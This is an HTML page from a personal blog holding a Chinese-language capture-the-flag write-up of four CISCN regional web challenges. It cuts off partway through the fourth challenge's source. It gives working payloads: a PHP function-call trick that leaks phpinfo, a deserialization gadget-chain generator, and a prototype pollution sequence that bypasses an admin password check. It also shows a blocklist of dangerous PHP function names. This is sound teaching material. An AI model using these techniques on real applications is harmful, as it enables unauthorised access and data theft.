<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"550532788.github.io","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="0x00 Perface​    这次比赛再次让我意识到了自己很菜，队友疯狂c，呜呜呜，希望下次可以多做几道题目。">
<meta property="og:type" content="article">
<meta property="og:title" content="[CISCN华中赛区 web]">
<meta property="og:url" content="https://550532788.github.io/2020/08/21/[CISCN%E5%8D%8E%E4%B8%AD%E8%B5%9B%E5%8C%BA%20web]/index.html">
<meta property="og:site_name" content="Cxlover&#39;s blog">
<meta property="og:description" content="0x00 Perface​    这次比赛再次让我意识到了自己很菜，队友疯狂c，呜呜呜，希望下次可以多做几道题目。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://images.cnblogs.com/cnblogs_com/cioi/1558332/o_200821074757image-20200821145404344.png">
<meta property="og:image" content="c:%5CUsers%5CAcer%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200821151622849.png">
<meta property="og:image" content="c:%5CUsers%5CAcer%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200821151851516.png">
<meta property="og:image" content="c:%5CUsers%5CAcer%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200821152824215.png">
<meta property="article:published_time" content="2020-08-21T07:54:54.131Z">
<meta property="article:modified_time" content="2020-08-21T07:54:54.131Z">
<meta property="article:author" content="Cxlover">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://images.cnblogs.com/cnblogs_com/cioi/1558332/o_200821074757image-20200821145404344.png">

<link rel="canonical" href="https://550532788.github.io/2020/08/21/[CISCN%E5%8D%8E%E4%B8%AD%E8%B5%9B%E5%8C%BA%20web]/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>[CISCN华中赛区 web] | Cxlover's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Cxlover's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section">Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section">Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://550532788.github.io/2020/08/21/[CISCN%E5%8D%8E%E4%B8%AD%E8%B5%9B%E5%8C%BA%20web]/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://i.loli.net/2020/10/30/Ots32uQAImSbJC8.png">
      <meta itemprop="name" content="Cxlover">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Cxlover's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          [CISCN华中赛区 web]
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-08-21 15:54:54" itemprop="dateCreated datePublished" datetime="2020-08-21T15:54:54+08:00">2020-08-21</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="0x00-Perface"><a href="#0x00-Perface" class="headerlink" title="0x00 Perface"></a><code>0x00</code> Perface</h3><p>​    这次比赛再次让我意识到了自己很菜，队友疯狂c，呜呜呜，希望下次可以多做几道题目。</p>
<a id="more"></a>

<h3 id="0x01-web1-easyphp"><a href="#0x01-web1-easyphp" class="headerlink" title="0x01 web1-easyphp"></a><code>0x01</code> <code>web1-easyphp</code></h3><p>​    题目一上来就给了源码:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">    <span class="comment">//题目环境：php:7.4.8-apache </span></span><br><span class="line">    $pid = pcntl_fork(); </span><br><span class="line">    <span class="keyword">if</span> ($pid == <span class="number">-1</span>) &#123; </span><br><span class="line">        <span class="keyword">die</span>(<span class="string">'could not fork'</span>); </span><br><span class="line">    &#125;<span class="keyword">else</span> <span class="keyword">if</span> ($pid)&#123; 			<span class="comment">//父进程</span></span><br><span class="line">        $r=pcntl_wait($status); </span><br><span class="line">        <span class="keyword">if</span>(!pcntl_wifexited($status))&#123; </span><br><span class="line">            phpinfo(); </span><br><span class="line">        &#125; </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123; 					    <span class="comment">//子进程</span></span><br><span class="line">        highlight_file(<span class="keyword">__FILE__</span>); </span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'a'</span>])&amp;&amp;is_string($_GET[<span class="string">'a'</span>])&amp;&amp;!preg_match(<span class="string">"/[:\\\\]|exec|pcntl/i"</span>,$_GET[<span class="string">'a'</span>]))&#123; </span><br><span class="line">            call_user_func_array($_GET[<span class="string">'a'</span>],[$_GET[<span class="string">'b'</span>],<span class="keyword">false</span>,<span class="keyword">true</span>]); </span><br><span class="line">        &#125; </span><br><span class="line">        posix_kill(posix_getpid(), SIGUSR1); </span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>​    经过分析之后我们可以知道，这题目是让我们使用<code>call_user_func_array</code>这个函数来执行一个可以停止当前进程的函数，但是和进程有关的<code>pcntl</code>全都被过滤了。并且，我们几乎所有的进程函数都是没有三个参数的。场面陷入的僵局。。</p>
<p>​    然后我在<code>FUZZ</code>的时候，偶然发现了<code>call_user_func</code>这个函数是可以支持三个参数的。突发奇想，我们是不是可以把参数缩短到<code>2</code>位。(因为 <code>$_GET[&#39;b&#39;]</code> 使我们可以控制的 且 <code>$_GET[&#39;b&#39;]</code>没有任何过滤，我们可以输入<code>b=pcntl_waitpid</code>)。这样我们的<code>payload</code>也就完成了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?a=call_user_func&amp;b=pcntl_waitpid</span><br></pre></td></tr></table></figure>

<p>​    打出<code>phpinfo</code>。直接搜索<code>flag</code>就可以了。</p>
<p>注一：之后发现<code>pcntl_wait</code>等让进程停止的函数都可以使用。</p>
<p>注二:    如果你还是在想<code>assert</code>和<code>eval</code>等语言结构，那只能说推荐你看一下我之前写的<code>php测试assert和eval</code>了。</p>
<h3 id="0x02-web2-babyunserialize"><a href="#0x02-web2-babyunserialize" class="headerlink" title="0x02 web2-babyunserialize"></a><code>0x02</code> <code>web2-babyunserialize</code></h3><p>​    同样给了源码。在根目录下的<code>www.zip</code>中。是一个框架的源码，打过近些天比赛的话可以发现，这其实是<code>WMCTF2020 webweb</code>的题目。不过之前的<code>payload</code>无法直接打通。网上随便找了条链通了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">DB</span>\<span class="title">SQL</span>&#123;</span><br><span class="line">    <span class="title">class</span> <span class="title">Mapper</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title">protected</span> $<span class="title">props</span>=[];</span><br><span class="line">        <span class="keyword">protected</span> $adhoc=[];</span><br><span class="line">        <span class="keyword">protected</span> $db;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;db = <span class="keyword">$this</span>;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;adhoc=[ <span class="number">-1</span> =&gt;[<span class="string">"cioi"</span>=&gt;<span class="string">"cioi"</span>]];</span><br><span class="line">            <span class="keyword">$this</span>-&gt;props = [<span class="string">'quotekey'</span> =&gt; <span class="string">"phpinfo"</span>];</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">CLI</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">DB</span>\<span class="title">SQL</span>\<span class="title">Mapper</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Agent</span></span></span><br><span class="line"><span class="class">    </span>&#123;</span><br><span class="line">        <span class="keyword">protected</span> $server;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;server = <span class="keyword">$this</span>;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;events = [<span class="string">"disconnect"</span>=&gt;[<span class="keyword">new</span> Mapper(),<span class="string">'find'</span>]];</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">WS</span></span>&#123;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;cioi = <span class="keyword">new</span> Agent();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> urlencode(serialize(<span class="keyword">new</span> WS()));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​    找的是<code>http://phoebe233.cn/?p=56#Webweb</code>大佬的<code>payload</code>。感谢大佬。</p>
<p>​    <code>payload</code>就是上面的那样了。但是这里我想啰嗦一下，说一下在审计框架时的东西。</p>
<p>​    首先，一位师傅问我为什么没有文件包含，但是我们却还是可以利用所有的类进行构造反序列化链。为了搞清楚框架的<code>__autoload</code>机制，我特地去问了学开发的叶局长（叶局tql!）。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php在实例化一个类的时候，如果找不到会自动调用 autoload 方法。我们在实例化一个 Student 类的时候，没有找到 Student ，就会把这个名字当做字符串传入。这也是为什么我们无法直接反序列化 Agent ，而要先创建 WS 的实例。因为没有 cli/Agent.php 只有 cli/WS.php 。从而成功包含 ws.php 。</span><br></pre></td></tr></table></figure>

<p>​    另一个知识点是<code>phpinfo(-1)</code>是显示所有的<code>phpinfo</code>信息。这个可以在官方文档中找到。</p>
<p>​    最后再讲一个人尽皆知的知识吧。几乎所有反序列化的入口点都是<code>__destruct</code>和<code>__wakeup</code>。所以审计框架的时候，我们最好先全局搜索这几个魔术方法。</p>
<p><img src="https://images.cnblogs.com/cnblogs_com/cioi/1558332/o_200821074757image-20200821145404344.png" alt="img"></p>
<h3 id="0x03-web3-littlegame"><a href="#0x03-web3-littlegame" class="headerlink" title="0x03 web3-littlegame"></a><code>0x03</code> <code>web3-littlegame</code></h3><p>​    题目全都给了源码。这里只贴一下关键代码:</p>
<p><code>app.js</code>:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">var</span> path = <span class="built_in">require</span>(<span class="string">'path'</span>);</span><br><span class="line"><span class="keyword">var</span> logger = <span class="built_in">require</span>(<span class="string">'morgan'</span>);</span><br><span class="line"><span class="keyword">const</span> Session = <span class="built_in">require</span>(<span class="string">'express-session'</span>);</span><br><span class="line"><span class="keyword">var</span> indexRouter = <span class="built_in">require</span>(<span class="string">'./routes/index'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> app = express();</span><br><span class="line"></span><br><span class="line">app.use(logger(<span class="string">'dev'</span>));</span><br><span class="line">app.use(express.json());</span><br><span class="line">app.use(express.urlencoded(&#123;<span class="attr">extended</span>: <span class="literal">false</span>&#125;));</span><br><span class="line">app.use(express.static(path.join(__dirname, <span class="string">'public'</span>)));</span><br><span class="line"></span><br><span class="line">app.use(Session(&#123;</span><br><span class="line">    name:<span class="string">"session"</span>,</span><br><span class="line">    secret:process.env.secret,</span><br><span class="line">    saveUninitialized:<span class="literal">true</span>,</span><br><span class="line">    resave:<span class="literal">false</span>,</span><br><span class="line">&#125;));</span><br><span class="line">app.use(<span class="string">'/'</span>, indexRouter);</span><br><span class="line"></span><br><span class="line"><span class="built_in">module</span>.exports = app;</span><br></pre></td></tr></table></figure>

<p><code>index.js</code>:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">const</span> setFn = <span class="built_in">require</span>(<span class="string">'set-value'</span>);</span><br><span class="line"><span class="keyword">var</span> router = express.Router();</span><br><span class="line"><span class="keyword">const</span> COMMODITY = &#123;</span><br><span class="line">    <span class="string">"sword"</span>: &#123;<span class="string">"Gold"</span>: <span class="string">"20"</span>, <span class="string">"Firepower"</span>: <span class="string">"50"</span>&#125;,</span><br><span class="line">    <span class="comment">// Times have changed</span></span><br><span class="line">    <span class="string">"gun"</span>: &#123;<span class="string">"Gold"</span>: <span class="string">"100"</span>, <span class="string">"Firepower"</span>: <span class="string">"200"</span>&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">const</span> MOBS = &#123;</span><br><span class="line">    <span class="string">"Lv1"</span>: &#123;<span class="string">"Firepower"</span>: <span class="string">"1"</span>, <span class="string">"Bounty"</span>: <span class="string">"1"</span>&#125;,</span><br><span class="line">    <span class="string">"Lv2"</span>: &#123;<span class="string">"Firepower"</span>: <span class="string">"5"</span>, <span class="string">"Bounty"</span>: <span class="string">"10"</span>&#125;,</span><br><span class="line">    <span class="string">"Lv3"</span>: &#123;<span class="string">"Firepower"</span>: <span class="string">"10"</span>, <span class="string">"Bounty"</span>: <span class="string">"15"</span>&#125;,</span><br><span class="line">    <span class="string">"Lv4"</span>: &#123;<span class="string">"Firepower"</span>: <span class="string">"20"</span>, <span class="string">"Bounty"</span>: <span class="string">"30"</span>&#125;,</span><br><span class="line">    <span class="string">"Lv5"</span>: &#123;<span class="string">"Firepower"</span>: <span class="string">"50"</span>, <span class="string">"Bounty"</span>: <span class="string">"65"</span>&#125;,</span><br><span class="line">    <span class="string">"Lv6"</span>: &#123;<span class="string">"Firepower"</span>: <span class="string">"80"</span>, <span class="string">"Bounty"</span>: <span class="string">"100"</span>&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">const</span> BOSS = &#123;</span><br><span class="line">    <span class="comment">// Times have not changed</span></span><br><span class="line">    <span class="string">"Firepower"</span>: <span class="string">"201"</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">const</span> Admin = &#123;</span><br><span class="line">    <span class="string">"password1"</span>:process.env.p1,</span><br><span class="line">    <span class="string">"password2"</span>:process.env.p2,</span><br><span class="line">    <span class="string">"password3"</span>:process.env.p3</span><br><span class="line">&#125;</span><br><span class="line">router.post(<span class="string">'/BuyWeapon'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res, next</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// not implement</span></span><br><span class="line">    res.send(<span class="string">"BOOS has said 'Times have not changed'!"</span>);</span><br><span class="line">&#125;);</span><br><span class="line">router.post(<span class="string">'/EarnBounty'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res, next</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// not implement</span></span><br><span class="line">    res.send(<span class="string">"BOOS has said 'Times have not changed'!"</span>);</span><br><span class="line">&#125;);</span><br><span class="line">router.post(<span class="string">'/ChallengeBOSS'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res, next</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// not implement</span></span><br><span class="line">    res.send(<span class="string">"BOOS has said 'Times have not changed'!"</span>);</span><br><span class="line">&#125;);</span><br><span class="line">router.post(<span class="string">"/DeveloperControlPanel"</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res, next</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// not implement</span></span><br><span class="line">    <span class="keyword">if</span> (req.body.key === <span class="literal">undefined</span> || req.body.password === <span class="literal">undefined</span>)&#123;</span><br><span class="line">        res.send(<span class="string">"What's your problem?"</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">let</span> key = req.body.key.toString();</span><br><span class="line">        <span class="keyword">let</span> password = req.body.password.toString();</span><br><span class="line">        <span class="keyword">if</span>(Admin[key] === password)&#123;</span><br><span class="line">            res.send(process.env.flag);</span><br><span class="line">        &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">            res.send(<span class="string">"Wrong password!Are you Admin?"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;);</span><br><span class="line">router.get(<span class="string">'/SpawnPoint'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res, next</span>) </span>&#123;</span><br><span class="line">    req.session.knight = &#123;</span><br><span class="line">        <span class="string">"HP"</span>: <span class="number">1000</span>,</span><br><span class="line">        <span class="string">"Gold"</span>: <span class="number">10</span>,</span><br><span class="line">        <span class="string">"Firepower"</span>: <span class="number">10</span></span><br><span class="line">    &#125;</span><br><span class="line">    res.send(<span class="string">"Let's begin!"</span>);</span><br><span class="line">&#125;);</span><br><span class="line">router.post(<span class="string">"/Privilege"</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res, next</span>) </span>&#123;</span><br><span class="line">    <span class="comment">// Why not ask witch for help?</span></span><br><span class="line">    <span class="keyword">if</span>(req.session.knight === <span class="literal">undefined</span>)&#123;</span><br><span class="line">        res.redirect(<span class="string">'/SpawnPoint'</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (req.body.NewAttributeKey === <span class="literal">undefined</span> || req.body.NewAttributeValue === <span class="literal">undefined</span>) &#123;</span><br><span class="line">            res.send(<span class="string">"What's your problem?"</span>);</span><br><span class="line">        &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">let</span> key = req.body.NewAttributeKey.toString();</span><br><span class="line">            <span class="keyword">let</span> value = req.body.NewAttributeValue.toString();</span><br><span class="line">            setFn(req.session.knight, key, value);    <span class="comment">// key value 可以控制</span></span><br><span class="line">            res.send(<span class="string">"Let's have a check!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="built_in">module</span>.exports = router;</span><br></pre></td></tr></table></figure>

<p>​    观察代码的业务逻辑可以知道，我们只要使用正确的密码登录就完事了，但是因为我们不知道密码，所以我们要自己添加密码，基本上一眼就可以看出是 <strong>原型链污染</strong>。关键是从哪里做，怎么做？</p>
<p>​    注意到<code>setFn</code>这个奇怪的函数。发现这个函数是<code>const setFn = require(&#39;set-value&#39;);</code>。查看文档发现我们可以利用它来原型链污染。走下流程。</p>
<p><code>1.先去/SpawnPoint设置一下 session.knight</code></p>
<p><code>2.然后去/Privilege传输 {&quot;NewAttributeKey&quot;:&quot;__proto__.cioi&quot;,&quot;NewAttributeValue&quot;:&quot;cioi&quot;}</code></p>
<p><img src="C:%5CUsers%5CAcer%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200821151622849.png" alt="image-20200821151622849"></p>
<p><code>3.最后去/DeveloperControlPanel传 {&quot;key&quot;:&quot;cioi&quot;,&quot;password&quot;:&quot;cioi&quot;}</code></p>
<p><img src="C:%5CUsers%5CAcer%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200821151851516.png" alt="image-20200821151851516"></p>
<h3 id="0x04-web4-rceme"><a href="#0x04-web4-rceme" class="headerlink" title="0x04 web4-rceme"></a><code>0x04</code> <code>web4-rceme</code></h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">error_reporting(<span class="number">0</span>); </span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>); </span><br><span class="line">parserIfLabel($_GET[<span class="string">'a'</span>]); </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">danger_key</span><span class="params">($s)</span> </span>&#123; </span><br><span class="line">    $s=htmlspecialchars($s); </span><br><span class="line">    $key=<span class="keyword">array</span>(<span class="string">'php'</span>,<span class="string">'preg'</span>,<span class="string">'server'</span>,<span class="string">'chr'</span>,<span class="string">'decode'</span>,<span class="string">'html'</span>,<span class="string">'md5'</span>,<span class="string">'post'</span>,<span class="string">'get'</span>,<span class="string">'request'</span>,<span class="string">'file'</span>,<span class="string">'cookie'</span>,<span class="string">'session'</span>,<span class="string">'sql'</span>,<span class="string">'mkdir'</span>,<span class="string">'copy'</span>,<span class="string">'fwrite'</span>,<span class="string">'del'</span>,<span class="string">'encrypt'</span>,<span class="string">'$'</span>,<span class="string">'system'</span>,<span class="string">'exec'</span>,<span class="string">'shell'</span>,<span class="string">'open'</span>,<span class="string">'ini_'</span>,<span class="string">'chroot'</span>,<span class="string">'eval'</span>,<span class="string">'passthru'</span>,<span class="string">'include'</span>,<span class="string">'require'</span>,<span class="string">'assert'</span>,<span class="string">'union'</span>,<span class="string">'create'</span>,<span class="string">'func'</span>,<span class="string">'symlink'</span>,<span class="string">'sleep'</span>,<span class="string">'ord'</span>,<span class="string">'str'</span>,<span class="string">'source'</span>,<span class="string">'rev'</span>,<span 